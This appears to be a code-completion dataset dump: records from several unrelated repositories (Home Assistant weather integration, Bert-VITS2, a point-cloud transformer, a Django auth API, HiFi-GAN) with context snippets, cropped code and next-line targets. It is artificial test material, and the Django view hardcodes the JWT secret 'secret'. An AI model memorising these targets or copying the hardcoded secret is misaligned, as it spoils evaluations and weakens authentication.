from homeassistant.helpers.aiohttp_client import async_get_clientsession
from homeassistant.helpers.selector import (EntitySelector,
EntitySelectorConfig,
SelectSelector,
SelectSelectorConfig,
SelectSelectorMode)
from .api import IrmKmiApiClient
from .const import (CONF_DARK_MODE, CONF_STYLE, CONF_STYLE_OPTIONS,
CONF_USE_DEPRECATED_FORECAST,
CONF_USE_DEPRECATED_FORECAST_OPTIONS, CONFIG_FLOW_VERSION,
DOMAIN, OPTION_DEPRECATED_FORECAST_NOT_USED,
OPTION_STYLE_STD, OUT_OF_BENELUX)
from .utils import get_config_value | 1,557 | """Config flow to set up IRM KMI integration via the UI."""
_LOGGER = logging.getLogger(__name__)
class IrmKmiConfigFlow(ConfigFlow, domain=DOMAIN):
VERSION = CONFIG_FLOW_VERSION
@staticmethod
@callback
def async_get_options_flow(config_entry: ConfigEntry) -> OptionsFlow:
"""Create the options flow."""
return IrmKmiOptionFlow(config_entry)
async def async_step_user(self, user_input: dict | None = None) -> FlowResult:
"""Define the user step of the configuration flow."""
errors = {}
if user_input:
_LOGGER.debug(f"Provided config user is: {user_input}")
if (zone := self.hass.states.get(user_input[CONF_ZONE])) is None:
errors[CONF_ZONE] = 'zone_not_exist'
# Check if zone is in Benelux
if not errors:
api_data = {}
try:
async with async_timeout.timeout(10):
api_data = await IrmKmiApiClient(
session=async_get_clientsession(self.hass)).get_forecasts_coord(
{'lat': zone.attributes[ATTR_LATITUDE],
'long': zone.attributes[ATTR_LONGITUDE]}
)
except Exception:
errors['base'] = "api_error"
if api_data.get('cityName', None) in OUT_OF_BENELUX:
errors[CONF_ZONE] = 'out_of_benelux'
if not errors:
await self.async_set_unique_id(user_input[CONF_ZONE])
self._abort_if_unique_id_configured()
state = self.hass.states.get(user_input[CONF_ZONE])
return self.async_create_entry(
title=state.name if state else "IRM KMI",
data={CONF_ZONE: user_input[CONF_ZONE],
| """Config flow to set up IRM KMI integration via the UI."""
_LOGGER = logging.getLogger(__name__)
class IrmKmiConfigFlow(ConfigFlow, domain=DOMAIN):
VERSION = CONFIG_FLOW_VERSION
@staticmethod
@callback
def async_get_options_flow(config_entry: ConfigEntry) -> OptionsFlow:
"""Create the options flow."""
return IrmKmiOptionFlow(config_entry)
async def async_step_user(self, user_input: dict | None = None) -> FlowResult:
"""Define the user step of the configuration flow."""
errors = {}
if user_input:
_LOGGER.debug(f"Provided config user is: {user_input}")
if (zone := self.hass.states.get(user_input[CONF_ZONE])) is None:
errors[CONF_ZONE] = 'zone_not_exist'
# Check if zone is in Benelux
if not errors:
api_data = {}
try:
async with async_timeout.timeout(10):
api_data = await IrmKmiApiClient(
session=async_get_clientsession(self.hass)).get_forecasts_coord(
{'lat': zone.attributes[ATTR_LATITUDE],
'long': zone.attributes[ATTR_LONGITUDE]}
)
except Exception:
errors['base'] = "api_error"
if api_data.get('cityName', None) in OUT_OF_BENELUX:
errors[CONF_ZONE] = 'out_of_benelux'
if not errors:
await self.async_set_unique_id(user_input[CONF_ZONE])
self._abort_if_unique_id_configured()
state = self.hass.states.get(user_input[CONF_ZONE])
return self.async_create_entry(
title=state.name if state else "IRM KMI",
data={CONF_ZONE: user_input[CONF_ZONE], | CONF_STYLE: user_input[CONF_STYLE], | 2 | 2023-12-17 16:35:01+00:00 | 2k |
v3ucn/Bert-vits2-V2.2 | oldVersion/V210/text/japanese_bert.py | [
{
"identifier": "config",
"path": "config.py",
"snippet": "class Resample_config:\nclass Preprocess_text_config:\nclass Bert_gen_config:\nclass Emo_gen_config:\nclass Train_ms_config:\nclass Webui_config:\nclass Server_config:\nclass Translate_config:\nclass Config:\n def __init__(self, in_dir: str, out_dir: str, sampling_rate: int = 44100):\n def from_dict(cls, dataset_path: str, data: Dict[str, any]):\n def __init__(\n self,\n transcription_path: str,\n cleaned_path: str,\n train_path: str,\n val_path: str,\n config_path: str,\n val_per_lang: int = 5,\n max_val_total: int = 10000,\n clean: bool = True,\n ):\n def from_dict(cls, dataset_path: str, data: Dict[str, any]):\n def __init__(\n self,\n config_path: str,\n num_processes: int = 2,\n device: str = \"cuda\",\n use_multi_device: bool = False,\n ):\n def from_dict(cls, dataset_path: str, data: Dict[str, any]):\n def __init__(\n self,\n config_path: str,\n num_processes: int = 2,\n device: str = \"cuda\",\n use_multi_device: bool = False,\n ):\n def from_dict(cls, dataset_path: str, data: Dict[str, any]):\n def __init__(\n self,\n config_path: str,\n env: Dict[str, any],\n base: Dict[str, any],\n model: str,\n num_workers: int,\n spec_cache: bool,\n keep_ckpts: int,\n ):\n def from_dict(cls, dataset_path: str, data: Dict[str, any]):\n def __init__(\n self,\n device: str,\n model: str,\n config_path: str,\n language_identification_library: str,\n port: int = 7860,\n share: bool = False,\n debug: bool = False,\n ):\n def from_dict(cls, dataset_path: str, data: Dict[str, any]):\n def __init__(\n self, models: List[Dict[str, any]], port: int = 5000, device: str = \"cuda\"\n ):\n def from_dict(cls, data: Dict[str, any]):\n def __init__(self, app_key: str, secret_key: str):\n def from_dict(cls, data: Dict[str, any]):\n def __init__(self, config_path: str):"
},
{
"identifier": "text2sep_kata",
"path": "oldVersion/V210/text/japanese.py",
"snippet": "def text2sep_kata(text: str) -> (list, list):\n parsed = pyopenjtalk.run_frontend(text)\n\n res = []\n sep = []\n for parts in parsed:\n word, yomi = replace_punctuation(parts[\"string\"]), parts[\"pron\"].replace(\n \"’\", \"\"\n )\n if yomi:\n if re.match(_MARKS, yomi):\n if len(word) > 1:\n word = [replace_punctuation(i) for i in list(word)]\n yomi = word\n res += yomi\n sep += word\n continue\n elif word not in rep_map.keys() and word not in rep_map.values():\n word = \",\"\n yomi = word\n res.append(yomi)\n else:\n if word in _SYMBOL_TOKENS:\n res.append(word)\n elif word in (\"っ\", \"ッ\"):\n res.append(\"ッ\")\n elif word in _NO_YOMI_TOKENS:\n pass\n else:\n res.append(word)\n sep.append(word)\n return sep, [hira2kata(i) for i in res], get_accent(parsed)"
}
] | import sys
import torch
from transformers import AutoModelForMaskedLM, AutoTokenizer
from config import config
from .japanese import text2sep_kata | 976 |
LOCAL_PATH = "./bert/deberta-v2-large-japanese-char-wwm"
tokenizer = AutoTokenizer.from_pretrained(LOCAL_PATH)
models = dict()
|
LOCAL_PATH = "./bert/deberta-v2-large-japanese-char-wwm"
tokenizer = AutoTokenizer.from_pretrained(LOCAL_PATH)
models = dict()
| def get_bert_feature(text, word2ph, device=config.bert_gen_config.device): | 0 | 2023-12-18 04:54:46+00:00 | 2k |
NOrangeeroli/SecondPose | model/pcd_cross/modules/transformer/pe_transformer.py | [
{
"identifier": "build_dropout_layer",
"path": "model/pcd_cross/modules/layers/factory.py",
"snippet": "def build_dropout_layer(p: Optional[float], **kwargs) -> nn.Module:\n r\"\"\"Factory function for dropout layer.\"\"\"\n if p is None or p == 0:\n return nn.Identity()\n else:\n return nn.Dropout(p=p, **kwargs)"
},
{
"identifier": "AttentionOutput",
"path": "model/pcd_cross/modules/transformer/output_layer.py",
"snippet": "class AttentionOutput(nn.Module):\n def __init__(self, d_model, dropout=None, activation_fn='ReLU'):\n super(AttentionOutput, self).__init__()\n self.expand = nn.Linear(d_model, d_model * 2)\n self.activation = build_act_layer(activation_fn)\n self.squeeze = nn.Linear(d_model * 2, d_model)\n self.dropout = build_dropout_layer(dropout)\n self.norm = nn.LayerNorm(d_model)\n\n def forward(self, input_states):\n hidden_states = self.expand(input_states)\n hidden_states = self.activation(hidden_states)\n hidden_states = self.squeeze(hidden_states)\n hidden_states = self.dropout(hidden_states)\n output_states = self.norm(input_states + hidden_states)\n return output_states"
}
] | import torch
import torch.nn as nn
import torch.nn.functional as F
from einops import rearrange
from ..layers import build_dropout_layer
from .output_layer import AttentionOutput | 1,236 | r"""Vanilla Transformer without positional embeddings.
The shape of input tensor should be (B, N, C). Implemented with `nn.Linear` and `nn.LayerNorm` (with affine).
"""
class PEMultiHeadAttention(nn.Module):
def __init__(self, d_model, num_heads, dropout=None):
super(PEMultiHeadAttention, self).__init__()
if d_model % num_heads != 0:
raise ValueError('`d_model` ({}) must be a multiple of `num_head` ({}).'.format(d_model, num_heads))
self.d_model = d_model
self.num_heads = num_heads
self.d_model_per_head = d_model // num_heads
self.proj_q = nn.Linear(self.d_model, self.d_model)
self.proj_k = nn.Linear(self.d_model, self.d_model)
self.proj_v = nn.Linear(self.d_model, self.d_model)
self.proj_p = nn.Linear(self.d_model, self.d_model)
self.dropout = build_dropout_layer(dropout)
def forward(
self,
input_q,
input_k,
input_v,
embed_q,
embed_k,
key_masks=None,
attention_factors=None,
):
"""Self-attention with positional embedding forward propagation.
Args:
input_q: torch.Tensor (B, N, C)
input_k: torch.Tensor (B, M, C)
input_v: torch.Tensor (B, M, C)
embed_q: torch.Tensor (B, N, C)
embed_k: torch.Tensor (B, M, C)
key_masks: torch.Tensor (B, M), True if ignored, False if preserved
attention_factors: torch.Tensor (B, N, M)
Returns:
hidden_states: torch.Tensor (B, C, N)
attention_scores: torch.Tensor (B, H, N, M)
"""
q = rearrange(self.proj_q(input_q) + self.proj_p(embed_q), 'b n (h c) -> b h n c', h=self.num_heads)
k = rearrange(self.proj_k(input_k) + self.proj_p(embed_k), 'b m (h c) -> b h m c', h=self.num_heads)
v = rearrange(self.proj_v(input_v), 'b m (h c) -> b h m c', h=self.num_heads)
attention_scores = torch.einsum('bhnc,bhmc->bhnm', q, k) / self.d_model_per_head ** 0.5
if attention_factors is not None:
attention_scores = attention_factors.unsqueeze(1) * attention_scores
if key_masks is not None:
attention_scores = attention_scores.masked_fill(key_masks.unsqueeze(1).unsqueeze(1), float('-inf'))
attention_scores = F.softmax(attention_scores, dim=-1)
attention_scores = self.dropout(attention_scores)
hidden_states = torch.matmul(attention_scores, v)
hidden_states = rearrange(hidden_states, 'b h n c -> b n (h c)')
return hidden_states, attention_scores
class PEAttentionLayer(nn.Module):
def __init__(self, d_model, num_heads, dropout=None):
super(PEAttentionLayer, self).__init__()
self.attention = PEMultiHeadAttention(d_model, num_heads, dropout=dropout)
self.linear = nn.Linear(d_model, d_model)
self.dropout = build_dropout_layer(dropout)
self.norm = nn.LayerNorm(d_model)
def forward(
self,
input_states,
memory_states,
input_embeddings,
memory_embeddings,
memory_masks=None,
attention_factors=None,
):
hidden_states, attention_scores = self.attention(
input_states,
memory_states,
memory_states,
input_embeddings,
memory_embeddings,
key_masks=memory_masks,
attention_factors=attention_factors,
)
hidden_states = self.linear(hidden_states)
hidden_states = self.dropout(hidden_states)
output_states = self.norm(hidden_states + input_states)
return output_states, attention_scores
class PETransformerLayer(nn.Module):
def __init__(self, d_model, num_heads, dropout=None, activation_fn='ReLU'):
super(PETransformerLayer, self).__init__()
self.attention = PEAttentionLayer(d_model, num_heads, dropout=dropout)
| r"""Vanilla Transformer without positional embeddings.
The shape of input tensor should be (B, N, C). Implemented with `nn.Linear` and `nn.LayerNorm` (with affine).
"""
class PEMultiHeadAttention(nn.Module):
def __init__(self, d_model, num_heads, dropout=None):
super(PEMultiHeadAttention, self).__init__()
if d_model % num_heads != 0:
raise ValueError('`d_model` ({}) must be a multiple of `num_head` ({}).'.format(d_model, num_heads))
self.d_model = d_model
self.num_heads = num_heads
self.d_model_per_head = d_model // num_heads
self.proj_q = nn.Linear(self.d_model, self.d_model)
self.proj_k = nn.Linear(self.d_model, self.d_model)
self.proj_v = nn.Linear(self.d_model, self.d_model)
self.proj_p = nn.Linear(self.d_model, self.d_model)
self.dropout = build_dropout_layer(dropout)
def forward(
self,
input_q,
input_k,
input_v,
embed_q,
embed_k,
key_masks=None,
attention_factors=None,
):
"""Self-attention with positional embedding forward propagation.
Args:
input_q: torch.Tensor (B, N, C)
input_k: torch.Tensor (B, M, C)
input_v: torch.Tensor (B, M, C)
embed_q: torch.Tensor (B, N, C)
embed_k: torch.Tensor (B, M, C)
key_masks: torch.Tensor (B, M), True if ignored, False if preserved
attention_factors: torch.Tensor (B, N, M)
Returns:
hidden_states: torch.Tensor (B, C, N)
attention_scores: torch.Tensor (B, H, N, M)
"""
q = rearrange(self.proj_q(input_q) + self.proj_p(embed_q), 'b n (h c) -> b h n c', h=self.num_heads)
k = rearrange(self.proj_k(input_k) + self.proj_p(embed_k), 'b m (h c) -> b h m c', h=self.num_heads)
v = rearrange(self.proj_v(input_v), 'b m (h c) -> b h m c', h=self.num_heads)
attention_scores = torch.einsum('bhnc,bhmc->bhnm', q, k) / self.d_model_per_head ** 0.5
if attention_factors is not None:
attention_scores = attention_factors.unsqueeze(1) * attention_scores
if key_masks is not None:
attention_scores = attention_scores.masked_fill(key_masks.unsqueeze(1).unsqueeze(1), float('-inf'))
attention_scores = F.softmax(attention_scores, dim=-1)
attention_scores = self.dropout(attention_scores)
hidden_states = torch.matmul(attention_scores, v)
hidden_states = rearrange(hidden_states, 'b h n c -> b n (h c)')
return hidden_states, attention_scores
class PEAttentionLayer(nn.Module):
def __init__(self, d_model, num_heads, dropout=None):
super(PEAttentionLayer, self).__init__()
self.attention = PEMultiHeadAttention(d_model, num_heads, dropout=dropout)
self.linear = nn.Linear(d_model, d_model)
self.dropout = build_dropout_layer(dropout)
self.norm = nn.LayerNorm(d_model)
def forward(
self,
input_states,
memory_states,
input_embeddings,
memory_embeddings,
memory_masks=None,
attention_factors=None,
):
hidden_states, attention_scores = self.attention(
input_states,
memory_states,
memory_states,
input_embeddings,
memory_embeddings,
key_masks=memory_masks,
attention_factors=attention_factors,
)
hidden_states = self.linear(hidden_states)
hidden_states = self.dropout(hidden_states)
output_states = self.norm(hidden_states + input_states)
return output_states, attention_scores
class PETransformerLayer(nn.Module):
def __init__(self, d_model, num_heads, dropout=None, activation_fn='ReLU'):
super(PETransformerLayer, self).__init__()
self.attention = PEAttentionLayer(d_model, num_heads, dropout=dropout) | self.output = AttentionOutput(d_model, dropout=dropout, activation_fn=activation_fn) | 1 | 2023-12-16 16:58:33+00:00 | 2k |
KatantDev/YMdantic | ymdantic/models/artists/artist.py | [
{
"identifier": "DeprecatedMixin",
"path": "ymdantic/mixins.py",
"snippet": "class DeprecatedMixin:\n \"\"\"Миксин, удаляющий устаревшие поля из модели.\"\"\"\n\n @model_validator(mode=\"before\")\n def remove_deprecated(cls, obj: Dict[str, Any]) -> Dict[str, Any]:\n \"\"\"\n Удаляет устаревшие поля из модели.\n\n :param obj: Словарь с данными модели.\n :return: Словарь с данными модели без устаревших полей.\n \"\"\"\n obj.pop(\"substituted\", None)\n obj.pop(\"deprecation\", None)\n obj.pop(\"decomposed\", None)\n if obj.get(\"version\") is not None:\n obj[\"title\"] += f\" ({obj.get('version')})\"\n obj.pop(\"version\")\n return obj"
},
{
"identifier": "YMBaseModel",
"path": "ymdantic/models/base.py",
"snippet": "class YMBaseModel(BaseModel, ClientMixin):\n \"\"\"Базовая Pydantic модель для всех будущих моделей.\"\"\"\n\n model_config = ConfigDict(\n alias_generator=to_camel,\n populate_by_name=True,\n extra=\"forbid\",\n )"
},
{
"identifier": "Cover",
"path": "ymdantic/models/cover.py",
"snippet": "class Cover(YMBaseModel):\n \"\"\"Pydantic модель, представляющая обложку альбома или артиста.\"\"\"\n\n type: Literal[\"from-artist-photos\", \"from-album-cover\"]\n # Тип обложки. Определяет источник обложки.\n uri: str\n # URI обложки. Это уникальный идентификатор, который можно использовать\n # для получения изображения обложки.\n prefix: str\n # Префикс URI. Используется для формирования полного пути к изображению\n # обложки.\n copyright_name: Optional[str] = None\n # Название правообладателя обложки. Используется очень редко.\n copyright_cline: Optional[str] = None\n # Копирайт обложки. Используется очень редко.\n\n def get_image_url(self, size: str = \"200x200\") -> HttpUrl:\n \"\"\"\n Возвращает URL изображения обложки с заданным размером.\n\n :param size: Размер изображения.\n :return: URL изображения обложки с заданным размером.\n \"\"\"\n return HttpUrl(f\"https://{self.uri.replace('%%', size)}\")"
}
] | from typing import List, Optional, Dict, Any, Literal
from pydantic import model_validator, HttpUrl
from ymdantic.mixins import DeprecatedMixin
from ymdantic.models.base import YMBaseModel
from ymdantic.models.cover import Cover | 899 |
class Artist(YMBaseModel, DeprecatedMixin):
"""Pydantic модель, представляющая информацию об артисте."""
id: int
# Уникальный идентификатор артиста.
name: str
# Имя артиста.
various: bool
# Флаг, указывающий, является ли артист группой.
composer: bool
# Флаг, указывающий, является ли артист композитором.
genres: List[str]
# Жанры треков артиста.
disclaimers: List[Literal[""]] # TODO: Проверить, что тут может быть.
# Список отказов от ответственности артиста.
|
class Artist(YMBaseModel, DeprecatedMixin):
"""Pydantic модель, представляющая информацию об артисте."""
id: int
# Уникальный идентификатор артиста.
name: str
# Имя артиста.
various: bool
# Флаг, указывающий, является ли артист группой.
composer: bool
# Флаг, указывающий, является ли артист композитором.
genres: List[str]
# Жанры треков артиста.
disclaimers: List[Literal[""]] # TODO: Проверить, что тут может быть.
# Список отказов от ответственности артиста. | cover: Optional[Cover] = None | 2 | 2023-12-21 21:24:10+00:00 | 2k |
MichealCodez/awesome-project-ideas | projects/artisans/backend/authentication/views.py | [
{
"identifier": "RegisterUserSerializer",
"path": "projects/artisans/backend/authentication/serializers.py",
"snippet": "class RegisterUserSerializer(serializers.ModelSerializer):\n class Meta:\n model = User # We defined the model to be the User model(default django User model).\n fields = ['id', 'first_name', 'last_name', 'username', 'email', 'password'] # Fields we need to register a user.\n\n # This code snippet is used to make the password field write only(not among user's data that'll be returned) for security reasons.\n extra_kwargs = {\n 'password':{'write_only':True}\n }\n\n # Let us hash the password for security reasons.\n def create(self, validated_data):\n password = validated_data.pop('password', None) # We are getting the password from the validated data.\n instance = self.Meta.model(**validated_data) # We are creating an instance of the User model with the validated data.\n if password is not None:\n instance.set_password(password) # We are hashing the password here.\n instance.save() # We are saving the instance.\n return instance # We are returning the instance."
},
{
"identifier": "ResetPasswordSerializer",
"path": "projects/artisans/backend/authentication/serializers.py",
"snippet": "class ResetPasswordSerializer(serializers.Serializer):\n user = User\n email = serializers.EmailField(required=True)\n new_password = serializers.CharField(max_length=68, required=True)\n confirm_password = serializers.CharField(max_length=68, required=True)"
}
] | from rest_framework.views import APIView
from .serializers import RegisterUserSerializer, ResetPasswordSerializer
from rest_framework.response import Response
from rest_framework.exceptions import AuthenticationFailed
from django.contrib.auth.models import User
from datetime import datetime, timedelta
import jwt | 1,071 |
# This is the view logic for registering a user.
# We defined the class and it inherits from the APIView class.
class RegisterUserView(APIView):
def post(self, request): # We defined a post method that takes in a request from a user.
# We defined a serializer variable that takes in the RegisterUserSerializer class and passes in the request data.
serializer = RegisterUserSerializer(data=request.data)
serializer.is_valid(raise_exception=True) # We are checking if the serializer is valid(we raise an exception if it is not valid).
serializer.save() # We save the serializer.
return Response(serializer.data) # We return the serializer data.
# This is the view logic for logging a user in.
class LoginUserView(APIView):
def post(self, request): # We defined a post method that takes in a request from a user.
email = request.data['email'] # We are getting the inputted email from the request data.
password = request.data['password'] # We are getting the inputted password from the request data.
# Let's check if the user exists in our database.
user = User.objects.filter(email=email).first()
if user is None:
raise AuthenticationFailed('User not found!')
# Let's check if the password is correct.
if not user.check_password(password):
raise AuthenticationFailed('Incorrect password!')
# Let's create a payload variable that takes in the user's id and the current time.
payload = {
'id':user.id,
'exp':datetime.utcnow() + timedelta(minutes=60),
'iat':datetime.utcnow()
}
# Let's create a token variable that takes in the payload and the secret key.
token = jwt.encode(payload, 'secret', algorithm='HS256')
response = Response()
# We are setting the cookie to the token.
response.set_cookie(key='jwt', value=token, httponly=True)
# We are returning the response data and making sure it is in string format.
response.data = {
'jwt':token.encode('utf8')
}
return response
# This is the view logic to retrieve a user's data using the token.
class UserView(APIView):
def get(self, request):
token = request.COOKIES.get('jwt')
if not token:
raise AuthenticationFailed('Unauthenticated!')
# We are getting the payload from the token.
try:
payload = jwt.decode(token, 'secret', algorithms=['HS256'])
except jwt.ExpiredSignatureError:
raise AuthenticationFailed('Unauthenticated!')
# We are getting the user from the payload.
user = User.objects.filter(id=payload['id']).first()
serializer = RegisterUserSerializer(user)
return Response(serializer.data)
# This is the view logic to logout a user.
class LogoutView(APIView):
def post(self, request):
response = Response()
response.delete_cookie('jwt') # We are deleting the cookie.
# We are returning the response data with a success status message.
response.data = {
'message':'Logout is successful'
}
return response
# This is the logic for resetting a forgotten password.
class ResetPasswordView(APIView):
def post(self, request):
|
# This is the view logic for registering a user.
# We defined the class and it inherits from the APIView class.
class RegisterUserView(APIView):
def post(self, request): # We defined a post method that takes in a request from a user.
# We defined a serializer variable that takes in the RegisterUserSerializer class and passes in the request data.
serializer = RegisterUserSerializer(data=request.data)
serializer.is_valid(raise_exception=True) # We are checking if the serializer is valid(we raise an exception if it is not valid).
serializer.save() # We save the serializer.
return Response(serializer.data) # We return the serializer data.
# This is the view logic for logging a user in.
class LoginUserView(APIView):
def post(self, request): # We defined a post method that takes in a request from a user.
email = request.data['email'] # We are getting the inputted email from the request data.
password = request.data['password'] # We are getting the inputted password from the request data.
# Let's check if the user exists in our database.
user = User.objects.filter(email=email).first()
if user is None:
raise AuthenticationFailed('User not found!')
# Let's check if the password is correct.
if not user.check_password(password):
raise AuthenticationFailed('Incorrect password!')
# Let's create a payload variable that takes in the user's id and the current time.
payload = {
'id':user.id,
'exp':datetime.utcnow() + timedelta(minutes=60),
'iat':datetime.utcnow()
}
# Let's create a token variable that takes in the payload and the secret key.
token = jwt.encode(payload, 'secret', algorithm='HS256')
response = Response()
# We are setting the cookie to the token.
response.set_cookie(key='jwt', value=token, httponly=True)
# We are returning the response data and making sure it is in string format.
response.data = {
'jwt':token.encode('utf8')
}
return response
# This is the view logic to retrieve a user's data using the token.
class UserView(APIView):
def get(self, request):
token = request.COOKIES.get('jwt')
if not token:
raise AuthenticationFailed('Unauthenticated!')
# We are getting the payload from the token.
try:
payload = jwt.decode(token, 'secret', algorithms=['HS256'])
except jwt.ExpiredSignatureError:
raise AuthenticationFailed('Unauthenticated!')
# We are getting the user from the payload.
user = User.objects.filter(id=payload['id']).first()
serializer = RegisterUserSerializer(user)
return Response(serializer.data)
# This is the view logic to logout a user.
class LogoutView(APIView):
def post(self, request):
response = Response()
response.delete_cookie('jwt') # We are deleting the cookie.
# We are returning the response data with a success status message.
response.data = {
'message':'Logout is successful'
}
return response
# This is the logic for resetting a forgotten password.
class ResetPasswordView(APIView):
def post(self, request): | serializer = ResetPasswordSerializer(data=request.data) | 1 | 2023-12-17 17:21:10+00:00 | 2k |
liuhuang31/hifigan-sr | inference.py | [
{
"identifier": "AttrDict",
"path": "env.py",
"snippet": "class AttrDict(dict):\n def __init__(self, *args, **kwargs):\n super(AttrDict, self).__init__(*args, **kwargs)\n self.__dict__ = self"
},
{
"identifier": "mel_spectrogram",
"path": "meldataset.py",
"snippet": "def mel_spectrogram(y, n_fft, num_mels, sampling_rate, hop_size, win_size, fmin, fmax, center=False, training=False):\n # if torch.min(y) < -1.:\n # print('min value is ', torch.min(y))\n # if torch.max(y) > 1.:\n # print('max value is ', torch.max(y))\n if training:\n with torch.no_grad():\n # 16k to 24k/48k\n if fmax <= 8000 and (sampling_rate == 24000 or sampling_rate == 48000):\n y = y.squeeze().cpu().numpy()\n y = librosa.resample(y, sampling_rate, 16000)\n y = librosa.resample(y, 16000, 24000)\n y = torch.FloatTensor(y)\n y = y.unsqueeze(0)\n sampling_rate = 24000\n n_fft = int(n_fft/2)\n hop_size=int(hop_size/2)\n win_size=int(win_size/2)\n # 24k to 48k\n elif fmax <= 12000 and sampling_rate == 48000:\n y = y.squeeze().cpu().numpy()\n y = librosa.resample(y, sampling_rate, 24000)\n y = torch.FloatTensor(y)\n y = y.unsqueeze(0)\n sampling_rate = 24000\n n_fft = int(n_fft/2)\n hop_size=int(hop_size/2)\n win_size=int(win_size/2)\n else:\n pass\n\n global mel_basis, hann_window\n if fmax not in mel_basis:\n mel = librosa_mel_fn(sampling_rate, n_fft, num_mels, fmin, fmax)\n mel_basis[str(fmax)+'_'+str(y.device)] = torch.from_numpy(mel).float().to(y.device)\n hann_window[str(y.device)] = torch.hann_window(win_size).to(y.device)\n\n y = torch.nn.functional.pad(y.unsqueeze(1), (int((n_fft-hop_size)/2), int((n_fft-hop_size)/2)), mode='reflect')\n y = y.squeeze(1)\n\n spec = torch.stft(y, n_fft, hop_length=hop_size, win_length=win_size, window=hann_window[str(y.device)],\n center=center, pad_mode='reflect', normalized=False, onesided=True)\n\n spec = torch.sqrt(spec.pow(2).sum(-1)+(1e-9))\n\n spec = torch.matmul(mel_basis[str(fmax)+'_'+str(y.device)], spec)\n spec = spectral_normalize_torch(spec)\n\n return spec"
},
{
"identifier": "MAX_WAV_VALUE",
"path": "meldataset.py",
"snippet": "MAX_WAV_VALUE = 32768.0"
},
{
"identifier": "load_wav",
"path": "meldataset.py",
"snippet": "def load_wav(full_path, sr):\n # sampling_rate, data = read(full_path)\n data, sampling_rate = librosa.load(full_path, mono=True, sr=sr)\n return data, sampling_rate"
},
{
"identifier": "Generator",
"path": "models.py",
"snippet": "class Generator(torch.nn.Module):\n def __init__(self, h):\n super(Generator, self).__init__()\n self.h = h\n self.num_kernels = len(h.resblock_kernel_sizes)\n self.num_upsamples = len(h.upsample_rates)\n self.conv_pre = weight_norm(Conv1d(80, h.upsample_initial_channel, 7, 1, padding=3))\n resblock = ResBlock1 if h.resblock == '1' else ResBlock2\n\n self.ups = nn.ModuleList()\n for i, (u, k) in enumerate(zip(h.upsample_rates, h.upsample_kernel_sizes)):\n self.ups.append(weight_norm(\n ConvTranspose1d(h.upsample_initial_channel//(2**i), h.upsample_initial_channel//(2**(i+1)),\n k, u, padding=(k-u)//2)))\n\n self.resblocks = nn.ModuleList()\n for i in range(len(self.ups)):\n ch = h.upsample_initial_channel//(2**(i+1))\n for j, (k, d) in enumerate(zip(h.resblock_kernel_sizes, h.resblock_dilation_sizes)):\n self.resblocks.append(resblock(h, ch, k, d))\n\n self.conv_post = weight_norm(Conv1d(ch, 1, 7, 1, padding=3))\n self.ups.apply(init_weights)\n self.conv_post.apply(init_weights)\n\n def forward(self, x):\n x = self.conv_pre(x)\n for i in range(self.num_upsamples):\n x = F.leaky_relu(x, LRELU_SLOPE)\n x = self.ups[i](x)\n xs = None\n for j in range(self.num_kernels):\n if xs is None:\n xs = self.resblocks[i*self.num_kernels+j](x)\n else:\n xs += self.resblocks[i*self.num_kernels+j](x)\n x = xs / self.num_kernels\n x = F.leaky_relu(x)\n x = self.conv_post(x)\n x = torch.tanh(x)\n\n return x\n\n def remove_weight_norm(self):\n print('Removing weight norm...')\n for l in self.ups:\n remove_weight_norm(l)\n for l in self.resblocks:\n l.remove_weight_norm()\n remove_weight_norm(self.conv_pre)\n remove_weight_norm(self.conv_post)"
}
] | import glob
import os
import librosa
import argparse
import json
import torch
from scipy.io.wavfile import write
from env import AttrDict
from meldataset import mel_spectrogram, MAX_WAV_VALUE, load_wav
from models import Generator | 1,598 | from __future__ import absolute_import, division, print_function, unicode_literals
h = None
device = None
def load_checkpoint(filepath, device):
assert os.path.isfile(filepath)
print("Loading '{}'".format(filepath))
checkpoint_dict = torch.load(filepath, map_location=device)
print("Complete.")
return checkpoint_dict
def get_mel(x):
return mel_spectrogram(x, h.n_fft, h.num_mels, h.sampling_rate, h.hop_size, h.win_size, h.fmin, h.fmax)
def get_mel_24k(x):
return mel_spectrogram(x, 1024, h.num_mels, 24000, 240, 1024, h.fmin, 8000)
def scan_checkpoint(cp_dir, prefix):
pattern = os.path.join(cp_dir, prefix + '*')
cp_list = glob.glob(pattern)
if len(cp_list) == 0:
return ''
return sorted(cp_list)[-1]
def inference(a):
| from __future__ import absolute_import, division, print_function, unicode_literals
h = None
device = None
def load_checkpoint(filepath, device):
assert os.path.isfile(filepath)
print("Loading '{}'".format(filepath))
checkpoint_dict = torch.load(filepath, map_location=device)
print("Complete.")
return checkpoint_dict
def get_mel(x):
return mel_spectrogram(x, h.n_fft, h.num_mels, h.sampling_rate, h.hop_size, h.win_size, h.fmin, h.fmax)
def get_mel_24k(x):
return mel_spectrogram(x, 1024, h.num_mels, 24000, 240, 1024, h.fmin, 8000)
def scan_checkpoint(cp_dir, prefix):
pattern = os.path.join(cp_dir, prefix + '*')
cp_list = glob.glob(pattern)
if len(cp_list) == 0:
return ''
return sorted(cp_list)[-1]
def inference(a): | generator = Generator(h).to(device) | 4 | 2023-12-16 01:21:00+00:00 | 2k |
edsu/marctable | test_marctable.py | [
{
"identifier": "MARC",
"path": "marctable/marc.py",
"snippet": "class MARC:\n def __init__(self) -> None:\n self.fields: List[Field] = []\n\n @cache\n def get_field(self, tag: str) -> Field:\n for field in self.fields:\n if field.tag == tag:\n return field\n raise SchemaFieldError(f\"{tag} is not a defined field tag in Avram schema\")\n\n @cache\n def get_subfield(self, tag: str, code: str) -> Subfield:\n field = self.get_field(tag)\n return field.get_subfield(code)\n\n @property\n def avram_file(self) -> pathlib.Path:\n return pathlib.Path(__file__).parent / \"marc.json\"\n\n @classmethod\n @cache\n def from_avram(cls: Type[\"MARC\"], avram_file: Optional[IO] = None) -> \"MARC\":\n marc = MARC()\n\n if avram_file is None:\n avram_file = marc.avram_file.open(\"r\")\n\n for d in json.load(avram_file)[\"fields\"].values():\n marc.fields.append(Field.from_dict(d))\n\n return marc\n\n def to_avram(self, avram_file: Optional[IO] = None) -> None:\n if avram_file is None:\n avram_file = self.avram_file.open(\"w\")\n\n d = {\n \"title\": \"MARC21 bibliographic format\",\n \"url\": \"https://www.loc.gov/marc/bibliographic/\",\n \"family\": \"marc\",\n \"language\": \"en\",\n \"fields\": {f.tag: f.to_dict() for f in self.fields},\n }\n json.dump(d, avram_file, indent=2)"
},
{
"identifier": "SchemaFieldError",
"path": "marctable/marc.py",
"snippet": "class SchemaFieldError(Exception):\n pass"
},
{
"identifier": "SchemaSubfieldError",
"path": "marctable/marc.py",
"snippet": "class SchemaSubfieldError(Exception):\n pass"
},
{
